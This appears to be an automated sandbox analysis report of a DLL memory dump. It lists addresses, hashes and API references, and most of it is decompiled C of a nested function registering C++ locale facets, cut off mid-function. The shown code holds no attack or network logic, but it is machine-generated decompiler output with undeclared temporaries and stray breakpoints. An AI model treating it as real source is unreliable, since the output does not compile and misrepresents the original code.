0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459
0x6e1cf3cc
0x6e1cf3cc
0x6e1cf3cf
0x6e1cf3d3
0x6e1cf3d7
0x6e1cf3e4
0x6e1cf3ec
0x6e1cf3ee
0x00000000
0x6e1cf3ee
0x6e1cf3b5
0x6e1cf3b5
0x00000000
0x6e1cf3b5
0x6e1cf3b3
0x6e1cf326
0x6e1cf326
0x6e1cf329
0x6e1cf32d
0x6e1cf331
0x6e1cf33e
0x6e1cf346
0x6e1cf348
0x00000000
0x6e1cf348
0x6e1cf30f
0x6e1cf30f
0x00000000
0x6e1cf30f
0x6e1cf30d
0x6e1cf280
0x6e1cf280
0x6e1cf283
0x6e1cf287
0x6e1cf28b
0x6e1cf298
0x6e1cf2a0
0x6e1cf2a2
0x00000000
0x6e1cf2a2
0x6e1cf269
0x6e1cf269
0x00000000
0x6e1cf269
0x6e1cf267
0x6e1cf1da
0x6e1cf1da
0x6e1cf1dd
0x6e1cf1e1
0x6e1cf1e5
0x6e1cf1f2
0x6e1cf1fa
0x6e1cf1fc
0x00000000
0x6e1cf1fc
0x6e1cf1c3
0x6e1cf1c3
0x00000000
0x6e1cf1c3
0x6e1cf1c1
0x6e1cf134
0x6e1cf134
0x6e1cf137
0x6e1cf13b
0x6e1cf13f
0x6e1cf14c
0x6e1cf154
0x6e1cf156
0x00000000
0x6e1cf156
0x6e1cf11d
0x6e1cf11d
0x00000000
0x6e1cf11d
0x6e1cf11b
0x6e1cf08e
0x6e1cf08e
0x6e1cf091
0x6e1cf095
0x6e1cf099
0x6e1cf0a6
0x6e1cf0ae
0x6e1cf0b0
0x00000000
0x6e1cf0b0
0x6e1cf077
0x6e1cf077
0x00000000
0x6e1cf077
0x6e1cf075

APIs

__EH_prolog3.LIBCMT ref: 6E1CF03E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF048
int.LIBCPMT ref: 6E1CF05F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1CF082
std::_Facet_Register.LIBCPMT ref: 6E1CF099
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF0D7

Strings

hm(n, xrefs: 6E1CF053

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hm(n
API String ID: 2363045490-1754184310
Opcode ID: e44881d88d9b301e8a5f142395027e792654b7ac311abb894e6c3684c2ed3ddf
Instruction ID: 66446ad53122b2cb91d9852ce40494e5717c218be43e345ec4f3715e5486a554
Opcode Fuzzy Hash: e44881d88d9b301e8a5f142395027e792654b7ac311abb894e6c3684c2ed3ddf
Instruction Fuzzy Hash: 81112C7591051D8BCF01DFD4C854AFEB7BBAF64B14F240809D520E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t858 - 0x14, 0);
				_t819 =  *0x6e286dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1A161C(0x6e286b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E1C66BA(_t858 - 0x14);
					return E6E1E0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E1D0E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t858 - 0x20);
							E6E1E3D74(_t858 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t799, _t819, 0x14);
							E6E1C6653(_t858 - 0x14, 0);
							_t820 =  *0x6e286de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1A161C(0x6e286d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E1C66BA(_t858 - 0x14);
								return E6E1E0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E1D0EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t858 - 0x20);
										E6E1E3D74(_t858 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t606, _t800, _t820, 0x14);
										E6E1C6653(_t858 - 0x14, 0);
										_t821 =  *0x6e286db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1A161C(0x6e286d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E1C66BA(_t858 - 0x14);
											return E6E1E0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E1D0F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t858 - 0x20);
													E6E1E3D74(_t858 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t606, _t801, _t821, 0x14);
													E6E1C6653(_t858 - 0x14, 0);
													_t822 =  *0x6e286dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1A161C(0x6e286d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E1C66BA(_t858 - 0x14);
														return E6E1E0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E1D0F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t858 - 0x20);
																E6E1E3D74(_t858 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t606, _t802, _t822, 0x14);
																E6E1C6653(_t858 - 0x14, 0);
																_t823 =  *0x6e286dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1A161C(0x6e286d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E1C66BA(_t858 - 0x14);
																	return E6E1E0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E1D0FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t858 - 0x20);
																			E6E1E3D74(_t858 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t606, _t803, _t823, 0x14);
																			E6E1C6653(_t858 - 0x14, 0);
																			_t824 =  *0x6e286df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1A161C(0x6e286d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E1C66BA(_t858 - 0x14);
																				return E6E1E0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E1D1057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t858 - 0x20);
																						E6E1E3D74(_t858 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t606, _t804, _t824, 0x14);
																						E6E1C6653(_t858 - 0x14, 0);
																						_t825 =  *0x6e286dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1A161C(0x6e286d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E1C66BA(_t858 - 0x14);
																							return E6E1E0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E1D10BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t858 - 0x20);
																									E6E1E3D74(_t858 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t606, _t805, _t825, 0x14);
																									E6E1C6653(_t858 - 0x14, 0);
																									_t826 =  *0x6e286df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1A161C(0x6e286da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E1C66BA(_t858 - 0x14);
																										return E6E1E0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E1D1127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t858 - 0x20);
																												E6E1E3D74(_t858 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t606, _t806, _t826, 0x14);
																												E6E1C6653(_t858 - 0x14, 0);
																												_t827 =  *0x6e286df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1A161C(0x6e286da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E1C66BA(_t858 - 0x14);
																													return E6E1E0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E1D11AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t858 - 0x20);
																															E6E1E3D74(_t858 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t606, _t807, _t827, 0x14);
																															E6E1C6653(_t858 - 0x14, 0);
																															_t828 =  *0x6e286dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1A161C(0x6e286d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E1C66BA(_t858 - 0x14);
																																return E6E1E0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E1D1230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t858 - 0x20);
																																		E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t606, _t808, _t828, 0x14);
																																		E6E1C6653(_t858 - 0x14, 0);
																																		_t829 =  *0x6e286dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6E1A161C(0x6e286d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6E1C66BA(_t858 - 0x14);
																																			return E6E1E0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6E1D12B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t858 - 0x20);
																																					E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t606, _t809, _t829, 0x14);
																																					E6E1C6653(_t858 - 0x14, 0);
																																					_t830 =  *0x6e286dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6E1A161C(0x6e286d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6E1C66BA(_t858 - 0x14);
																																						return E6E1E0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6E1D1339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t858 - 0x20);
																																								E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t606, _t810, _t830, 0x14);
																																								E6E1C6653(_t858 - 0x14, 0);
																																								_t831 =  *0x6e286db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6E1A161C(0x6e286d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6E1C66BA(_t858 - 0x14);
																																									return E6E1E0075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6E1D13A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t858 - 0x20);
																																											E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t606, _t811, _t831, 0x14);
																																											E6E1C6653(_t858 - 0x14, 0);
																																											_t832 =  *0x6e286ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6E1A161C(0x6e286d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6E1C66BA(_t858 - 0x14);
																																												return E6E1E0075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6E1D1409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t858 - 0x20);
																																														E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t606, _t812, _t832, 0x14);
																																														E6E1C6653(_t858 - 0x14, 0);
																																														_t833 =  *0x6e286de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6E1A161C(0x6e286d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6E1C66BA(_t858 - 0x14);
																																															return E6E1E0075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6E1D1471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t858 - 0x20);
																																																	E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t606, _t813, _t833, 0x14);
																																																	E6E1C6653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6e286dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6E1A161C(0x6e286da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t858 - 0x14);
																																																		return E6E1E0075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6E1D14EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t858 - 0x20);
																																																				E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t606, _t814, _t834, 0x14);
																																																				E6E1C6653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6e286dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6E1A161C(0x6e286d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t858 - 0x14);
																																																					return E6E1E0075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6E1D1558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t858 - 0x20);
																																																							E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t606, _t815, _t835, 0x14);
																																																							E6E1C6653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6e286e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6E1A161C(0x6e286dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t858 - 0x14);
																																																								return E6E1E0075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6E1D15C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t858 - 0x20);
																																																										E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t606, _t816, _t836, 0x14);
																																																										E6E1C6653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6e286dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6E1A161C(0x6e286d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t858 - 0x14);
																																																											return E6E1E0075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6E1D162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6E1A1438(_t739);
																																																													E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e22851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6e22c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6E1D542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6E1E0075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t817);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6e286dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t816);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6e286e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t815);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6e286dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t814);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6e286dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t813);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6e286de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t812);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6e286ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t811);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6e286db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
